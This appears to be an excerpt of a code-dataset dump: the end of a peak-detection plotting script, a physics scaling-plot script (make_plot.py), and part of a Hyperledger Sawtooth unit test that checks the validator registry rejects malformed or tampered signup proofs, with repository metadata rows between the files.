51,51,52,52,52,49,48,49,48,47,36,27,25,25,27,31,33,33,31,26,26,31,32,32,33,27,20,15,11,2,0,0,0,0,0,0,0,0,0,0,0,0,15,22,26,29,35,40,48,50,53,55,55,54,56,53,50,38,42,42,44,55,71,73,72,72,73,72,72,70,66,64,61,59,60,59,61,62,61,62,63,64,67,71,72,74,76,74,69,63,59,56,56,53,53,54,57,58,63,89,96,97,101,100,98,93,88,88,89,90,91,91,90,92,91,82,82,87,95,97,94,91,89,86,79,75,68,61,49,42,33,30,35,38,41,42,43,44,45,45,46,46,46,47,46,46,45,43,41,37,31,29,28,33,35,35,34,32,29,23,20,19,18,16,16,15,14,13,11,11,9,8,5,0,0,0,0,3,11,21,22,23,22,21,20,19,17,17,16,16,21,25,27,27,26,26,25,29,28,29,33,35,40,43,44,46,49,53,58,60,60,60,56,48,39,32,32,37,36,38,44,46,46,47,48,49,51,51,50,49,48,49,50,49,41,37,30,27,26,28,38,42,45,48,51,52,55,57,59,60,66,72,52,48,35,20,17,10,10,10,10,10,10,10,10,10,10,9,9,8,8,7,7,5,0,0,0,0,3,5,5,7,7,8,8,9,10,10,9,8,8,7,5,0,0,0,0,0,0,0,0,0,0,0,0,4,13,25,27,29,30,27,15,15,15,16,15,16,16,16,16,15,14,14,11,0,4,6,7,7,7,7,6,6,6,8,11,13,14,14,15,16,16,17,19,19,20,20,21,20,21,20,19,18,17,17,16,16,15,14,12,12,11,10,10,9,8,7,5,15,19,20,21,21,23,27,41,44,46,48,48,45,45,43,42,40,39,34,22,19,18,18,19,19,20,21,27,38,42,42,42,42,42,45,44,44,46,52,60,61,60,59,56,48,44,43,45,44,43,41,40,43,42,43,46,46,50,51,52,48,44,41,42,41,46,55,58,57,57,50,57,59,58,59,60,59,46,52,53,53,53,53,54,53,53,51,47,44,38,33,29,30,30,30,29,28,27,25,25,24,24,24,24,24,25,27,29,33,32,31,30,29,29,29,30,30,30,30,34,32,25,11,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,16,21,22,20,18,16,14,10,5,0,0,0,0,6,11,13,15,17,19,21,20,18,18,19,20,17,16,16,14,20,26,26,25,24,25,25,22,21,19,18,19,20,25,33,37,41,46,50,55,57,58,43,29,23,32,34,38,41,45,52,53,53,55,53,50,48,60,67,66,64,71,73,75,77,82,79,74,72,71,56,51,49,49,47,47,46,36,30,27,26,22,22,21,20,19,17,14,14,17,18,19,21,23,25,29,35,40,37,31,26,20,15,8,4,0,0,0,0,0,0,0,0,0,7,12,14,15,16,16,15,14,13,11,11,11,11,11,11,11,11,11,11,10,15,17,24,36,41,42,44,47,38,33,34,35,36,36,36,37,38,39,39,41,58,60,63,66,71,72,73,71,62,62,61,65,66,67,80,81,80,80,80,80,78,69,63,55,52,51,49,47,46,54,60,63,63,63,57,54,51,48,44,38,42,42,42,49,61,63,63,62,55,51,45,43,37,36,50,51,51,50,51,54,51,46,44,41,36,32,34,36,41,51,61,59,58,59,56,53,50,47,44,39,36,30,21,15,14,12,9,6,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])
x = np.arange(len(y))
y1 = signal.savgol_filter(y, 51, 5)
indexes= peakutils.indexes(y, thres=0.6, min_dist=20)
indexes1= peakutils.indexes(y1, thres=0.5, min_dist=20)
print(max(y),sum(y)/len(y))
print(len(indexes),len(indexes1))
pyplot.plot(x,y,label="shadow")
pyplot.plot(x,y1,label='smooth shadow')
pyplot.plot(x[indexes],y[indexes], 'o', color='r')
pyplot.plot(x[indexes1],y1[indexes1], 'o', color='b')
pyplot.title('Graph of Shadow')
pyplot.xlabel('Width')
pyplot.ylabel('Pixels')
pyplot.legend()
pyplot.show()
| 292.75
| 7,582
| 0.648286
| 2,815
| 8,197
| 1.886679
| 0.053996
| 0.146865
| 0.20787
| 0.260591
| 0.145735
| 0.115986
| 0.10337
| 0.094333
| 0.086424
| 0.078893
| 0
| 0.599435
| 0.006832
| 8,197
| 28
| 7,583
| 292.75
| 0.052942
| 0
| 0
| 0
| 0
| 0
| 0.005977
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.1
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2d2af1b461cbb566446ea40178c060b9ce6d442
| 10,108
|
py
|
Python
|
make_plot.py
|
weinbe58/tfim_noise
|
36e9e569eb92a9a48277eb53ffb24cc3dae8a9b1
|
[
"BSD-3-Clause"
] | null | null | null |
make_plot.py
|
weinbe58/tfim_noise
|
36e9e569eb92a9a48277eb53ffb24cc3dae8a9b1
|
[
"BSD-3-Clause"
] | null | null | null |
make_plot.py
|
weinbe58/tfim_noise
|
36e9e569eb92a9a48277eb53ffb24cc3dae8a9b1
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.lines import Line2D
import numpy as np
import glob,sys,os
def marker_style(i):
color = ['red','green','blue','fuchsia','yellow','orange','aqua','lime','teal']
n_color = len(color)
n_marker = len(Line2D.filled_markers)
markers = Line2D.filled_markers
fillstyle = ["full","none","top","bottom","left","right"]
j = i % n_color
jj = (i // n_color) % len(fillstyle)
return dict(color=color[j],marker=markers[j],fillstyle=fillstyle[jj])
def plot(ax,filedict,ncol,ecol=None,xlabel=None,ylabel=None,keys=None,logx=True,logy=False,legend_opts={},
xscale=0.0,yscale=0.0,yshift=None,xshift=None,xlim=None,ylim=None,legend=False):
if xshift is None:
xshift = lambda v,L:0.0
if yshift is None:
yshift = lambda v,L:0.0
if keys is None:
keys = filedict.keys()
keys.sort(key=lambda x:x[0])
for i,key in enumerate(keys):
L,label = key
data =filedict[key]
v = data[:,0]
y = (data[:,ncol]-yshift(v,L))*L**yscale
x = (v-xshift(v,L))*L**xscale
if ecol is not None:
err = data[:,ecol]*L**yscale
ax.errorbar(x,y,err,label=label,markersize=3,linewidth=1,**marker_style(i))
else:
ax.plot(x,y,label=label,markersize=3,linewidth=1,**marker_style(i))
if logx:
ax.set_xscale("log", nonposx='clip')
ax.xaxis.set_major_locator(ticker.LogLocator(base=10.0, numticks=15))
if logy:
ax.set_yscale("log", nonposy='clip')
ax.yaxis.set_major_locator(ticker.LogLocator(base=10.0, numticks=15))
if xlabel is not None:
ax.set_xlabel(xlabel,fontsize=10)
if ylabel is not None:
ax.set_ylabel(ylabel,fontsize=10)
if xlim is not None:
ax.set_xlim(xlim)
if ylim is not None:
ax.set_ylim(ylim)
if legend:
ax.legend(**legend_opts)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(7)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(7)
ax.tick_params(axis="both",which="both",direction="in")
def spin_bath_1d_2():
datafile = "data/spin_bath_2.npz"
runs = np.load(datafile)
keys = runs.keys()
keys.sort()
print keys
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print data.shape
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list >= L**2/10.0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_xy_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 3.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^3$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_xy_scale_3.pdf"),bbox_inches="tight")
def spin_bath_1d_5():
datafile = "data/spin_bath_5.npz"
runs = np.load(datafile)
keys = runs.keys()
keys.sort()
print keys
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print data.shape
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list < 2*L
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_1d_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 1.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_1d_scale_1.pdf"),bbox_inches="tight")
def spin_bath_2d_1():
datafile = "data/2d_spin_bath_1.npz"
runs = np.load(datafile)
keys = runs.keys()
keys.sort()
print keys
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print data.shape
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list < 10*np.sqrt(n**2+m**2)
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_2d_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 1.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_2d_scale_1.pdf"),bbox_inches="tight")
def tfim_1d_snake():
datafile = "data/snake_2.npz"
runs = np.load(datafile)
keys = runs.keys()
keys.sort()
print keys
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print data.shape
for i,L in enumerate(L_list):
key = (L,"$L={}$".format(int(L)))
d = np.hstack((np.atleast_2d(1.0/T_list).T,data[0,i,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2)
plot(ax1,datadict,1,ecol=2,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["logy"] = True
plot(ax2,datadict,3,ecol=4,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_snake_scale_2.pdf"),bbox_inches="tight")
plt.clf()
spin_bath_2d_1()
spin_bath_1d_5()
spin_bath_1d_2()
tfim_1d_snake()
| 22.765766
| 106
| 0.639098
| 1,837
| 10,108
| 3.42896
| 0.101252
| 0.018257
| 0.013335
| 0.020003
| 0.806953
| 0.798063
| 0.786792
| 0.773932
| 0.758374
| 0.744721
| 0
| 0.054458
| 0.1389
| 10,108
| 444
| 107
| 22.765766
| 0.669233
| 0.090127
| 0
| 0.715302
| 0
| 0
| 0.093733
| 0.015477
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017794
| null | null | 0.02847
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0c569a0531019dbcb6916074d2eafce32a2c24ea
| 33,558
|
py
|
Python
|
consensus/poet/families/tests/test_tp_validator_registry.py
|
trust-tech/sawtooth-core
|
fcd66ff2f13dba51d7642049e0c0306dbee3b07d
|
[
"Apache-2.0"
] | 1
|
2017-08-04T10:31:00.000Z
|
2017-08-04T10:31:00.000Z
|
consensus/poet/families/tests/test_tp_validator_registry.py
|
trust-tech/sawtooth-core
|
fcd66ff2f13dba51d7642049e0c0306dbee3b07d
|
[
"Apache-2.0"
] | null | null | null |
consensus/poet/families/tests/test_tp_validator_registry.py
|
trust-tech/sawtooth-core
|
fcd66ff2f13dba51d7642049e0c0306dbee3b07d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import json
import base64
import hashlib
from sawtooth_processor_test.transaction_processor_test_case \
import TransactionProcessorTestCase
from validator_reg_message_factory import ValidatorRegistryMessageFactory
from sawtooth_poet_common import sgx_structs
from sawtooth_poet_common.protobuf.validator_registry_pb2 import \
ValidatorRegistryPayload
PRIVATE = '5HsjpyQzpeoGAAvNeG5PzQsn1Ght18GgSmDaEUCd1c1HpA2avzc'
PUBLIC = '02f3d385777ab35888fc47af6d123bba6f8b04817a4746e97446ce1562fc4307d7'
class TestValidatorRegistry(TransactionProcessorTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.factory = ValidatorRegistryMessageFactory(
private=PRIVATE,
public=PUBLIC)
def _expect_invalid_transaction(self):
self.validator.expect(
self.factory.create_tp_response("INVALID_TRANSACTION"))
def _expect_ok(self):
self.validator.expect(self.factory.create_tp_response("OK"))
def test_valid_signup_info(self):
"""
Testing valid validator_registry transaction. This includes sending new
signup info for a validator that has already been registered.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
# Expect Request for the ValidatorMap
received = self.validator.expect(
self.factory.create_get_request_validator_map())
# Respond with a empty validator Map
self.validator.respond(
self.factory.create_get_empty_response_validator_map(), received)
# Expect a set the new validator to the ValidatorMap
received = self.validator.expect(
self.factory.create_set_request_validator_map())
# Respond with the ValidatorMap address
self.validator.respond(
self.factory.create_set_response_validator_map(),
received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info("val_1",
"registered"))
# Respond with address for val_1
# val_1 address is derived from the validators id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(),
received)
self._expect_ok()
# --------------------------
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
# Expect Request for the ValidatorMap
received = self.validator.expect(
self.factory.create_get_request_validator_map())
# Respond with a validator Map
self.validator.respond(
self.factory.create_get_response_validator_map(),
received)
# Expect to receive a validator_info request
received = self.validator.expect(
self.factory.create_get_request_validator_info())
# Respond with the ValidatorInfo
self.validator.respond(
self.factory.create_get_response_validator_info(
"val_1"), received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info(
"val_1", "revoked"))
# Respond with address for val_1
# val_1 address is derived from the validators id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(), received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info("val_1",
"registered"))
# Respond with address for val_1
# val_1 address is derived from the validators id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(),
received)
self._expect_ok()
def test_invalid_name(self):
"""
Test that a transaction with an invalid name returns an invalid
transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# The name is longer the 64 characters
payload = ValidatorRegistryPayload(
verb="reg",
name="val_11111111111111111111111111111111111111111111111111111111"
"11111",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
self._expect_invalid_transaction()
def test_invalid_id(self):
"""
Test that a transaction with an id that does not match the
signer_pubkey returns an invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# The idea should match the signer_pubkey in the transaction_header
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id="bad",
signup_info=signup_info
)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
self._expect_invalid_transaction()
def test_invalid_poet_pubkey(self):
"""
Test that a transaction without a poet_public_key returns an invalid
transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
signup_info.poet_public_key = "bad"
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
self._expect_invalid_transaction()
def _test_bad_signup_info(self, signup_info, expect_config=True):
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
if expect_config:
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.
create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
self._expect_invalid_transaction()
def test_invalid_verification_report(self):
"""
Test that a transaction whose verification report is invalid returns
an invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# Verification Report is None
proof_data = signup_info.proof_data
signup_info.proof_data = json.dumps({})
self._test_bad_signup_info(signup_info, expect_config=False)
# ------------------------------------------------------
# No verification signature
proof_data_dict = json.loads(proof_data)
del proof_data_dict["signature"]
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info, expect_config=False)
# ------------------------------------------------------
# Bad verification signature
proof_data_dict["signature"] = "bads"
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No EPID pseudonym
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report["epidPseudonym"]
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Altered EPID pseudonym (does not match anti_sybil_id)
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report["epidPseudonym"] = "altered"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Nonce does not match the one in signup_info
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
signup_info.nonce = 'a non-matching nonce'
self._test_bad_signup_info(signup_info)
def test_invalid_pse_manifest(self):
"""
Test that a transaction whose pse_manifast is invalid returns an
invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
proof_data = signup_info.proof_data
proof_data_dict = json.loads(proof_data)
# ------------------------------------------------------
# no pseManifestStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report['pseManifestStatus']
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad pseManifestStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['pseManifestStatus'] = "bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No pseManifestHash
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report['pseManifestHash']
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad pseManifestHash
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['pseManifestHash'] = "Bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Missing evidence payload
evidence_payload = proof_data_dict["evidence_payload"]
del proof_data_dict["evidence_payload"]
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Missing PSE manifest
del evidence_payload["pse_manifest"]
proof_data_dict["evidence_payload"] = evidence_payload
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad PSE manifest
evidence_payload["pse_manifest"] = "bad"
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
def test_invalid_enclave_body(self):
"""
Test that a transaction whose enclave_body is invalid returns an
invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
proof_data = signup_info.proof_data
proof_data_dict = json.loads(proof_data)
# ------------------------------------------------------
# No isvEnclaveQuoteStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
enclave_status = verification_report["isvEnclaveQuoteStatus"]
verification_report["isvEnclaveQuoteStatus"] = None
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad isvEnclaveQuoteStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
